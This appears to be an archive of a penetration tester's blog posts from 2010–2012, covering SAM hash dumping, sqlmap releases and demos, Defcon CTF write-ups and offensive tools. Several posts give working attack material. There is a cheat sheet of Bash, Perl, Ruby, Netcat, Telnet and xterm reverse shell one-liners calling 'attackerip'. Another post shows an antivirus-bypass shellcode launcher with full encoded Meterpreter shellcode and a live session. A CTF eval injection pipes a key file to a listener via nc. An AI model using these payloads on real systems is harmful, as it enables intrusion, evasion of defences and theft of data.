The concept behind in-memory dump of SAM hashes it to inject a DLL into the LSASS system process or, generally speaking, parsing the memory for specific patterns and inspect these memory pages' content. The former action can lead to a Blue Screen of Death (BSoD) condition following a crash of the LSASS process therefore this action is not recommended on production environments: prefer registry hive copy (regback.exe and reg.exe/regedit.exe) and Volume Shadow Copies techniques instead. Nevertheless, in some specific instances, the in-memory technique is required.

The most widely known standalone tool to dump SAM hashes is probably fgdump, the successor of pwdump6, both tools developed by the foofus team. The main advantage of fgdump over pwdump6 is that it works on Windows Vista and later versions. Although, I have seen them both failing under some circumstances. More reliable tools include pwdump7 from Andres Tarasco and the gsecdump from TrueSec. Both work on 32-bit and 64-bit systems across all versions of Windows. Although, the former cannot successfully dump users' password hashes on domain controllers as it reads the SAM hashes from the registry rather than injecting into LSASS process. Despite not working on 64-bit systems, another popular and reliable tool is PWDumpX by Reed Arvin.

The following screen-shot shows the dump of SAM users with gsecdump on a Windows Server 2003 SP2 32-bit:

Dump of local users with gsecdump by code injection into the LSASS process

The Metasploit Framework also has its own post-exploitation modules, Meterpreter built-in command and dated Meterpreter script to dump the SAM hashes. Details on how these pieces of code work within the framework and which techniques they implement can be found on these blog posts by HD Moore.

Needless to say that there are more options and knowledge of which one to use within the target environment is important. In order to facilitate this task, I have listed the relevant tools, their capabilities, where they do work and, most importantly, where they are known to fail on this spread-sheet.

Updates on January 4, 2012

David Maloney has committed recently to the Metasploit Framework post modules to manage Volume Shadow Copy.
TrueSec has recently updated gsecdump to v2.0b5. This version works reliably across all Windows versions on both 32-bit and 64-bit architecture.

The top 125 computer security tools

2011-11-10T20:07:00.000+00:00

The security community has spoken! About 3,000 people have rated the best and most widely used computer security tools. The Nmap project has collected the results of their survey in a relaunched version of their SecTools.org project: Top 125 Network Security Tools.

sqlmap has made it to place #30 overall: a great result considering that it is a two-developers only project driven by passion, developed in our own spare time and with a large community of supporters, testers and enthusiasts.

The previous SecTools.org survey was dated 2006, when sqlmap project was just started and unknown to the most. In five years the tool has evolved from a few hundred of lines of code to a massive python tool, versatile and powerful. The security community has acknowledged this: it is the only tool in the list to combine SQL injection detection, data analysis and database takeover capabilities against numerous database management systems despite a lot of others similar tool have been developed throughout the years.

I found particularly interesting that many people highly rated web proxies in the web scanners category: 3 of the top 5 tools are web proxies. I read it as a positive sign: it means to me that manual testing is the preferred way by many to perform web application assessments as opposed to fully automated web scanners that, for the sake of clarity, can not cover business logic flaws by their design nature, hardly identify session management issues and struggle with multiple user levels' access control list enforcement verification.

The #1 tool in the category is Burp Suite, a tool that I use on many web application and web service penetration testing engagements. A tool that eases and assists me in the process of carefully and manually assessing the security of web applications. Congratulations to Dafydd Stuttard for his great work!

sqlmap scored 6th place in this category, ahead of several commercial web scanners backed by big companies and developed by dozen of people. People could argue that this is because sqlmap is free so more people have access to it, fair point. I like to think that it scored high also because it addresses one single web application vulnerability type, the most critical, and does it damn well in the right hands. On top, we have added a lot of features, takeover functionalities, coverage for many database management systems and several optimizations.

Out of 11 tools in the sploits category, sqlmap was rated 4th: another great result in my opinion. Like Metasploit framework (#1 of the category) and w3af (#3 of the category), it is open source. It's the only niche tool focusing on exploiting SQL injections, database design flaws and their mis-configurations against a variety of database software.

sqlmap would not be the great tool that it is today without its users' base. I want to thank everyone that have contributed during the last five years with moral support, detailed feedback, overly appreciated patches, bug reports and acclaiming it publicly as a very handy and valuable tool.

Greetings also to the authors of renowned books for citing and reviewing sqlmap. These include the recently revamped The Web Application Hacker's Handbook and SQL injection attacks and defense.

Reverse shells one-liners

2011-09-14T08:58:00.000+01:00

Inspired by the great blog post by pentestmonkey.net, I put together the following extra methods and alternatives for some methods explained in the cheat sheet. There is nothing cutting edge, however you may find this handy during your penetration tests.

Citing pentestmonkey's blog post:

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.

[...] your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.

First of all, on your machine, set up a listener, where attackerip is your IP address and 4444 is an arbitrary TCP port unfiltered by the target's firewall:

attacker$ nc -l -v attackerip 4444

Bash

Alternatives for Bash shell:

exec /bin/bash 0&0 2>&0

Or:

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

Or:

exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done

See also Reverse Shell With Bash from GNUCITIZEN blog.

Perl

Shorter Perl reverse shell that does not depend on /bin/sh:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

If the target system is running Windows use the following one-liner:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

Longer Ruby reverse shell that does not depend on /bin/sh:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

If the target system is running Windows use the following one-liner:

ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat

Others possible Netcat reverse shells, depending on the Netcat version and compilation flags:

nc -c /bin/sh attackerip 4444

Or:

/bin/sh | nc attackerip 4444

Or:

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

Telnet

Of course, you can also use Telnet as an alternative for Netcat:

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p

Or:

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp

xterm

Follows further details on xterm reverse shell:

To catch incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001). One way to do this is with Xnest:

Xnest :1

Then remember to authorise on your system the target IP to connect to you:

xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest
xhost +targetip # Run this INSIDE the spawned xterm on the open X Server

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:

xterm -display attackerip:1

Or:

$ DISPLAY=attackerip:0 xterm

It will try to connect back to you, attackerip, on TCP port 6001.

Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:

/usr/openwin/bin/xterm -display attackerip:1

MS10-070: Padding Oracle applied to .NET framework

2011-04-16T14:12:00.008+01:00

A lot has already been said about T. Duong and J. Rizzo research on Padding Oracle attacks, particularly against ASP.NET. I won't repeat any of it. I am just releasing way late my minor contribution.

Microsoft replied to the research and subsequently released an initial mitigation that can be easily bypassed by tools like PadBuster - when used correctly. However, with the release of the patch, MS10-070, the issue has been correctly fixed.

As far as I can tell, many systems running .NET applications that I have been assessing since then have not been patched, yet.

I followed the research closely and way before vulnerability scanners like Nessus could detect the security vulnerability on .NET applications anonymously and remotely, I coded a small script to test for the flaw based on Juliano Rizzo's details. You might still find it useful, so I thought about publishing it on GitHub.

Script usage

$ python ms10-070_check.py

Use:

./ms10-070_check.py

Note:

Encrypted 'd' block MUST be from ScriptResource.axd or WebResource.axd.

Parse the application response body to find a valid one.

Examples:

With ScriptResource.axd 'd' block:

$ ./ms10-070_check.py 2nYOzoKtRvjs-g53K3r7VKmEXeQl_XMNY8nDEwcgwGVcS5Z8b9GanbNdzIgg493kfB_oInMb2DtFFEy5e-ajqdwMbg1F96l10

Your application is VULNERABLE, patch against MS10-070

With WebResource.axd 'd' block:

./ms10-070_check.py VHYaLecZ91Zjq-_4mV3ftpYrTteh9kHzk9zwLyjpAZAOjWL3nbx1SmIeGdHJwBu_koMj8ZGAqrtxCJkW0

Your application is NOT vulnerable

Feedback is always welcome!

Reverse connection: ICMP shell

2011-04-15T11:42:00.016+01:00

Background

Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly!

Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell.

However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus on this post.

Surfing the Net I found two handy tools to get a reverse shell over ICMP:

soicmp - Developed in Python. Some useful features like the possibility to run soicmp daemon on multiple ethernet interfaces simultaneously handling multiple client connections. Unfortunately it uses RAW_SOCKETS on both client and server. You'll need the highest system privileges (root / administrator) to successfully run it on both endpoints. This means that you need root privileges onto the target system that you have owned, which might not always be the case. It is cross-platform. Also, it looks to me that it is unmaintained as of 2006-10-26.
icmpshell - Developed in C. As per soicmp, it uses raw sockets on both the client and server side, therefore root privileges are required to use this program. It works on POSIX systems only, no support for Windows. Also, it looks to me that it is unmaintained as of 2002-02-06.

icmpsh

Last year a friend of mine coded a tool called icmpsh. It implements the reverse ICMP shell concept very well. The main advantage over the other open source tools is that it does not require administrative privileges to run onto the target machine.

I spent some time playing with the tool and was immediately impressed. It is clean, easy and portable. The slave (client) runs on the target machine, it is written in C and works on Windows only whereas the master (server) can run on any platform as it has been implemented in C and Perl by Nico. I ported it to Python too.

The reason for the Python port is that I wrapped it into sqlmap too. As of version 0.9 stable you can either establish the out-of-band connection via TCP with Metasploit or via ICMP with icmpsh - switch --os-pwn.

Features

Open source software - primarily coded by Nico, forked by me.
Client/server architecture.
The master is portable across any platform that can run either C, Perl or Python code.
The target system has to be Windows because the slave runs on that platform only for now.
The user running the slave on the target system does not require administrative privileges.

Example

Running icmpsh slave on target system (192.168.136.129) by specifying the master IP 192.168.136.1

Running icmpsh master on attacker machine (192.168.136.1) and issuing two

OS commands onto the target system (192.168.136.129)

Response packet from icmpsh slave containing output of issued command whoami

The forked tool can be found on my GitHub at https://github.com/inquisb/icmpsh.

Feedback is always welcome!

Execute Metasploit payloads bypassing any anti-virus

2011-04-14T15:03:00.012+01:00

History

Back in 2009, a friend and I presented at SOURCE Barcelona conference a technique to inject an alphanumeric-encoded shellcode in memory and execute it, bypassing any anti virus software, amongst other features. This was part of a research lent in sqlmap as a user-defined function for both MySQL and PostgreSQL.

Recently, I have slightly modified the code to leverage the technique in a clever shellcode launcher, shellcodeexec.

Background

Most of the shellcode launchers out there, including proof of concepts part of many security books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems.

Description

This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems.

Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe

This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot.

I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor.

So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play!

Features

shellcodeexec:

Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
Can be compiled and works on 32-bit and 64-bit architectures.
As far as I know, no AV detect it as malicious.
Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable.
It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

Example

1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Windows target:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1KsVIO6OuZVCEXlISAA

2. Execute the Metasploit multi/handler listener on your machine. For example for a Windows target:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Windows target:

C:\WINDOWS\Temp>shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1KsVIO6OuZVCEXlISAA

If you head back to the terminal where the multi/handler is running you will happily see:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E

[*] Please wait while we load the module tree...

[...]

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]

+ -- --=[ 673 exploits - 354 auxiliary

+ -- --=[ 217 payloads - 27 encoders - 8 nops

=[ svn r12306 updated 7 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp

EXITFUNC => thread

LPORT => 4444

LHOST => 192.168.136.1

[*] Started reverse handler on 192.168.136.1:4444

[*] Starting the payload handler...

[*] Sending stage (749056 bytes) to 192.168.136.129

[*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011

meterpreter > sysinfo

System Language : en_US

OS : Windows .NET Server (Build 3790, Service Pack 2).

Computer : W2K3R2

Architecture : x86

Meterpreter : x86/win32

The tool along with compilation files for POSIX and Windows systems can be found on my GitHub at https://github.com/inquisb/shellcodeexec.

Feedback is always welcome!

sqlmap 0.9 released

2011-04-13T15:10:00.002+01:00

It has been a while since we released the previous stable version of sqlmap. Now sqlmap 0.9 stable is out!

Some of the new features include:

Rewritten SQL injection detection engine.
Support to directly connect to the database without passing via a SQL injection, -d switch.
Added full support for both time-based blind SQL injection and error-based SQL injection techniques.
Implemented support for SQLite 2 and 3.
Implemented support for Firebird.
Implemented support for Microsoft Access, Sybase and SAP MaxDB.
Added support to tamper injection data with --tamper switch.
Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack.
Added support to fetch unicode data.
Added support to use persistent HTTP(s) connection for speed improvement, --keep-alive switch.
Implemented several optimization switches to speed up the exploitation of SQL injections.
Support to parse and test forms on target url, --forms switch.
Added switches to brute-force tables names and columns names with a dictionary attack, --common-tables and --common-columns. Useful for instance when system table information_schema is not available on MySQL.

As usual, the full list of changes at https://svn.sqlmap.org/sqlmap/trunk/sqlmap/doc/ChangeLog.

sqlmap state of art - 4 years later

2010-11-17T10:31:00.007+00:00

sqlmap is nearly 4 years and a half old.. older than my daughters ;)

In the last 12 months a lot has been going on under the hood. Miroslav and I have been working hard trying to fix as many bugs reported as possible, getting back to You as promptly as possible and scheduling the development of new shiny features, some of them proposed by You.

First and foremost, I would like to sincerely thank Miroslav for all of the amazing effort that he has put into the project as well as users' support. He joined me about a year ago. Since then he has demonstrated high professionalism, brilliant design and analytical capabilities and strong development skills driven by his outstanding motivation. Thank you!

In my state of art - 3 years later email I highlighted the main goals achieved during 2009 and my plans for the next release. What's the state now, a year later?

The post-exploitation features have been stabilized, slightly improved and bug-fixed.
I can still confirm that we keep receiving a lot of great feedback from You, thank you! Your bug reports, feature requests and dumb questions too keep sqlmap community alive and drive our motivation even further.
The media attention to the tool is approximately vanished, as I have not presented at big name Conferences this year.
I don't think the tool is still the most downloaded tool in the category, might be, but sourceforge now allows to see only the weekly downloads of tools from the search page. However, who really cares.
The detection and comparison engine has been bug fixed, partially rewritten and highly improved by Miroslav - I told you, he is awesome!
My call for developers is still open, quality assurance and beta testers are needed too. Some native English speaking would be of help to improve the user's manual too.

What have we achieved during 2010? The ones that regularly update from the Subversion repository, read the ChangeLog file or asked us directly, already know about some of the new features, but we would like to take the time to better introduce, explain and demonstrate them in a series of posts to the mailing list that will follow in the upcoming weeks. We hope that this will clarify design decisions that we have made, make you smile seeing your feature requests implemented and have a strong understanding on how to use the tool efficiently.

These will all be part of the next release: 0.9, scheduled for early 2011. Stay tuned!

Text cross-posted on sqlmap-users mailing list.

sqlmap and SOAP based web services

2010-06-30T10:03:00.011+01:00

Last week a sqlmap user, Chilik Tamir, provided me with a patch to add basic support for SOAP based requests to the tool.

I tested the patch, extended its functionalities and now sqlmap can also work against web services! Check it out from the Subversion repository.

Follows an example against IBM's demo web application Testfire which is affected, amongst other vulnerabilities, by several SOAP based SQL injections. The credentials to login are username jsmith, password Demo1234.

Upon a successful login, click on Transfer Funds and trasfer any amount between your test bank accounts by pressing on the Transfer Money button. By intercepting the HTTP request with a proxy, we can see that the transfer is a HTTP POST request with XML formatted data to a web service:

POST /bank/ws.asmx HTTP/1.1
Host: demo.testfire.net
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
SOAPAction: http://www.altoromutual.com/bank/ws/TransferBalance
Content-Type: text/xml; charset=UTF-8
Referer: http://demo.testfire.net/bank/transfer.aspx
Cookie: ASP.NET_SessionId=5zjqz1qgn4r32iytnfm2sd45; amSessionId=4183186617; amUserInfo=UserName=anNtaXRo&Password=RGVtbzEyMzQ=; amUserId=100116014; amCreditOffer=CardType=Gold&Limit=10000&Interest=7.9
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 554

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
  <TransferBalance xmlns="http://www.altoromutual.com/bank/ws/">
   <transDetails>
    <transferDate>2000-01-01</transferDate>
    <debitAccount>1001160140</debitAccount>
    <creditAccount>1001160140</creditAccount>
    <transferAmount>1500</transferAmount>
   </transDetails>
  </TransferBalance>
</soap:Body>
</soap:Envelope>

Save the whole HTTP request to a text file (soap.txt in my following example) and pass it to sqlmap as the request file (-r switch). To speed things up you can also provide only one XML tag (parameter, -p switch) to test for SQL injection and exploit:

$ python sqlmap.py -r soap.txt -p creditAccount

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:29:46

[10:29:46] [INFO] parsing HTTP request from 'soap.txt'
[10:29:46] [WARNING] the testable parameter 'creditAccount' you provided is not into the Cookie
[10:29:46] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/demo.testfire.net/session' as session file
[10:29:46] [INFO] testing connection to the target url
[10:29:46] [INFO] testing if the url is stable, wait a few seconds
[10:29:49] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher, if no dynamic nor injectable parameters are detected, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
[10:29:49] [INFO] testing if POST parameter '{http://www.altoromutual.com/bank/ws/}creditAccount' is dynamic
[10:29:50] [INFO] confirming that POST parameter '{http://www.altoromutual.com/bank/ws/}creditAccount' is dynamic
[10:29:51] [INFO] POST parameter '{http://www.altoromutual.com/bank/ws/}creditAccount' is dynamic
[10:29:51] [INFO] testing sql injection on POST parameter '{http://www.altoromutual.com/bank/ws/}creditAccount' with 0 parenthesis
[10:29:51] [INFO] testing unescaped numeric injection on POST parameter '{http://www.altoromutual.com/bank/ws/}creditAccount'
[10:29:53] [INFO] confirming unescaped numeric injection on POST parameter '{http://www.altoromutual.com/bank/ws/}creditAccount'
[10:29:54] [INFO] POST parameter '{http://www.altoromutual.com/bank/ws/}creditAccount' is unescaped numeric injectable with 0 parenthesis
[10:29:54] [INFO] testing for parenthesis on injectable parameter
[10:29:57] [INFO] the injectable parameter requires 0 parenthesis
[10:29:57] [INFO] testing MySQL
[10:29:58] [WARNING] the back-end DMBS is not MySQL
[10:29:58] [INFO] testing Oracle
[10:29:58] [WARNING] the back-end DMBS is not Oracle
[10:29:58] [INFO] testing PostgreSQL
[10:29:59] [WARNING] the back-end DMBS is not PostgreSQL
[10:29:59] [INFO] testing Microsoft SQL Server
[10:30:00] [WARNING] the back-end DMBS is not Microsoft SQL Server
[10:30:00] [INFO] testing SQLite
[10:30:00] [WARNING] the back-end DMBS is not SQLite
[10:30:00] [INFO] testing Microsoft Access
[10:30:01] [INFO] confirming Microsoft Access
[10:30:02] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access

As you can see, sqlmap performed SOAP based requests, parsed the POST data properly, identified that the creditAccount tag is affected by a SQL injection and exploited it to identify the back-end database management system, Microsoft Access.

Microsoft Access support is one of the work in progress features that Miroslav and I have been working on lately, along many other features.

If you want to reproduce this example, you need to checkout sqlmap latest development version from the Subversion repository, login onto the demo test to renew the session cookie and fire up sqlmap!

Got database access? Own the network!

2010-06-28T12:43:00.012+01:00

Earlier this month I attended to AthCon conference in Athens (Greece) where I gave a talk, met some very smart people, did some awesome sight-seeing of the Acropolis, had good food and better-than-UK weather ;)

My presentation was titled Got database access? Own the network! and the abstract is as follows:

The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process’ privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.

My presentation slides are online on Slideshare. You can also read them below.

Thanks AthCon team for organizing such a great event and giving me the opportunity to come over!

Defcon 18 CTF quals writeup: Pwtent Pwnables 200

2010-05-25T22:09:00.013+01:00

The third Defcon 18 CTF challenge that I solved with two team mates was Pwtent Pwnables 200.

Title: Running on pwn8.ddtek.biz.Enjoy

File: pp200_73774703181e8703d24.bin (mirrored here).

I downloaded the file and checked it's type:

file pp200_73774703181e8703d24.bin
pp200_73774703181e8703d24.bin: python 2.3 byte-compiled

With DePython I de-compiled the byte-code and got its working Python source code. We started looking into the code and while I was editing it to be a standalone application, a team mate spotted that by connecting from port 28741/TCP to the server you get access to the execution of the eval() command in the code - thanks Alex!

Anyway, my standalone rewrite of the source code with the seed fixed to 28741 was as follows:

class Server:
    __module__ = __name__
    lotto_grid = None
    connstream_fobj = None

    def createWinners(self):
        winners = set()

        while (len(winners) < PICK_SIZE):
            winners.update([random.randint(1, RAND_MAX)])

        return winners

    def pickRandom(self):
        picks = set()
        llen = len(self.lotto_grid)
        rand_base = (len(picks) - 1)

        while (len(picks) < PICK_SIZE):
            i = random.randint(rand_base, RAND_MAX)

            if ((i < 1) and ++i):
                pass

            if ((i > llen) and ((i % llen) == 0)):
                i += 1

            i = (i % llen)
            picks.update([i])

        return picks

    def genGrid(self):
        grid = [WINNER_CHECK_FUNCTION]

        print "before:"
        print grid

        while (len(grid) != LOTTO_GRID_SIZE):
            grid.append(random.randint(0, RAND_MAX))

        print "after:"
        print grid

        return grid

    def checkWinners(self, element):
        winner = True

        for n in self.winners:
            winner = (winner & (n in [ self.lotto_grid[p] for p in self.pick_list ]))

        if winner:
            print 'ZOMG You won!!!'
            pass

    def playGame(self):
        print 'Thanks for your choices, calculating if you won...'
        eval(self.lotto_grid[0])(self.lotto_grid[1:])

    def getLine(self, msg):
        #return self.connstream_fobj.readline(MAX_READ)
        print msg
        choice = sys.stdin.readline().replace("\n","")
        return choice

    def handlePickChange(self):
        for r in range(0, MAX_PICK_CHANGES):
            choice = self.getLine('Input the number of the pick that you wish to change or newline to stop:')

            if (choice.strip() == ''):
                break
            else:
                idx_to_edit = int(choice)
                l = self.getLine('Input your new pick')
                self.lotto_grid[self.pick_list[idx_to_edit]] = l

    def handle(self, seed):
        # Local port
        #rand_seed = self.request.getpeername()[1]
        rand_seed = seed
        #self.connstream_fobj = self.request.makefile()
        random.seed(rand_seed)

        print 'Welcome to lottod good luck!'
        self.lotto_grid = self.genGrid()
        self.pick_list = list(self.pickRandom())
        self.winners = self.createWinners()

        print "self.lotto_grid:", self.lotto_grid
        print "self.pick_list:", self.pick_list
        print "self.winners:", self.winners

        print 'Your random picks are:'

        for pick_idx in range(0, PICK_SIZE):
            print ('%d. %s' % (pick_idx, self.lotto_grid[self.pick_list[pick_idx]]))

        # Added by myself, called elsewhere in the original version
        self.handlePickChange()
        self.playGame()

seed = 28741
foo = Server()
foo.handle(seed)

I wrote this code so that I did not need to connect to the target system so often and to understand better the code work-flow.

Looking at the source code we see that the programs binds on TCP port 10024. We also know how to get to the execution of the eval() code, but how to exploit it?

eval(self.lotto_grid[0])(self.lotto_grid[1:])

Well, we have control of the first 4 or 5 elements of the self.lotto_grid list - they are asked once the program gets executed. Let's say we put as the first element os.popen and as second element id (or any other OS command) this would get executed.. if os library was one of the imports of the program and if self.lotto_grid had only two elements.

We then had to find:

A Python one-liner to import os (or any other useful library) to execute OS command(s).
Ignore all list elements from the third on - self.lotto_grid[1:].

Together with another team mate (thanks jekil!) we found the following way to exploit it:

lambda x: __import__("os").popen("id")

As the program itself does not show any useful output, I could not have seen any output of the execution of the injected OS command(s). I then binded netcat listening on my box on my public IP interface:

nc -l -p 44444 -s PUBLIC_IP -v

At this point I used ncat to connect to the target system setting 28741 as source port:

ncat -p 28741 pwn8.ddtek.biz 10024

I was prompted with the expected message, typed into 0 to change the first peak (self.lotto_grid[0]). I typed into the following string:

lambda x: __import__("os").popen("cat /usr/home/lottod/key | nc PUBLIC_IP 44444")

And RETURN to end edits. At this point the execution flow hits the eval() which translate in the code as:

eval('lambda x: __import__("os").popen("cat /usr/home/lottod/key | nc PUBLIC_IP 44444")')(['list', 'of', 'ignored', 'elements'])

Pwned!

I have got the magic key in front of me on my terminal running netcat.

The key is holdem is a safer bet than lotto.

Thanks again to my team mates for their input!

Defcon 18 CTF quals writeup: Pursuit Trivial 200

2010-05-25T21:45:00.004+01:00

The second Defcon 18 CTF challenge that I solved was Pursuit Trivial 200.

Title: sheep@pwn21.ddtek.biz:6000 sheep go baaAaaA

Being it part of the trivial category I though immediately that the password for user sheep was baaAaaA and in fact, it was.

I logged into the server over SSH and got a grey terminal where I could not type in any command. I thought that it was a local issue, but it wasn't. I tried to resize the terminal with no luck.

By swapping in and out of the terminal, I accidentally spotted the cursor at the very top left corner of the screen. Same position of any common text editor. My first try was to terminate it with usual CTRL+* combinations and :q!. None of these work, but at this point I wondered if it was Vi.

Like I did a few times in the past during jail break assessments, I (ab)used Vi set command as follows:

:set shell=/bin/sh
:sh

Pwned!

I typed in the following commands and luckily the key was in my home directory:

id
uid=505(sheep) gid=505(sheepy) groups=505(sheepy) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
pwd
/chroot/home/sheep
ls
key
